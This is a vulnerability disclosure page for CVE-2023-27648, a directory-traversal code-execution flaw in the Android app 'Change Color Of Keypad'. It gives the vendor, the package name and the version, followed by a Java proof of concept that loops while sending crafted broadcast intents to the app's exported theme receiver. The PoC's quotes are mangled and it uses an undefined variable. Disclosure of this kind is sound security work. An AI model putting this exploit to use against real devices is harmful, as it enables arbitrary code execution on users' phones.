Headline
CVE-2023-27648: SODA/CVE detail.md at main · LianKee/SODA
Directory Traversal vulnerability found in T-ME Studios Change Color of Keypad v.1.275.1.277 allows a remote attacker to execute arbitrary code via the dex file in the internal storage.
Permalink
Cannot retrieve contributors at this time
Code execution exists in Change Color Of Keypad(CVE-2023-27648)
Vendor:T-ME Studios (https://corporate.timmystudios.com/)
Affected product:Change Color Of Keypad (com.jb.gokeyboard.theme.twchangecolorofkeypad)
Version:11.275.1.277
Download link:https://play.google.com/store/apps/details?id=com.jb.gokeyboard.theme.twchangecolorofkeypad
Description of the vulnerability for use in the CVE:Directory Traversal vulnerability found in T-ME Studios Change Color of Keypad v.1.275.1.277 allows a remote attacker to execute arbitrary code via the dex file in the internal storage.
poc:
private void attack() { while (true) { Intent intent = new Intent(); ComponentName componentName = new ComponentName("com.jb.gokeyboard.theme.twchangecolorofkeypad", “com.timmystudios.redrawkeyboard.themes.SuperThemeReceiver”); intent.setComponent(componentName); intent.setAction(“com.timmystudios.redrawkeyboard.intent.action.THEME_APPLIED”); intent.putExtra(“package-name","com.ludashi.xsuperclean”); intent.putExtra("selected-font",true); intent.putExtra(“font_name","hack”); intent.putExtra(“font_id","2”); intent.putExtra(“font_resource","hackkkk”); intent.putExtra("font_size",123456); intent.putExtra("selected-sound",true); intent.putExtra(“sound_name","hack”); intent.putExtra(“sound_id","2”); intent.putExtra(“sound_resource","hackkkk”); intent.putExtra("sound_size",123456); intent.putExtra("go_theme_id",3); intent.putExtra(“go_res_zip_path","/data/local/tmp/test.zip”); System.out.println(“发送的数据大小:” + legnth); try { System.out.println(“发送数据”); sendBroadcast(intent); } catch (Exception e) { } } }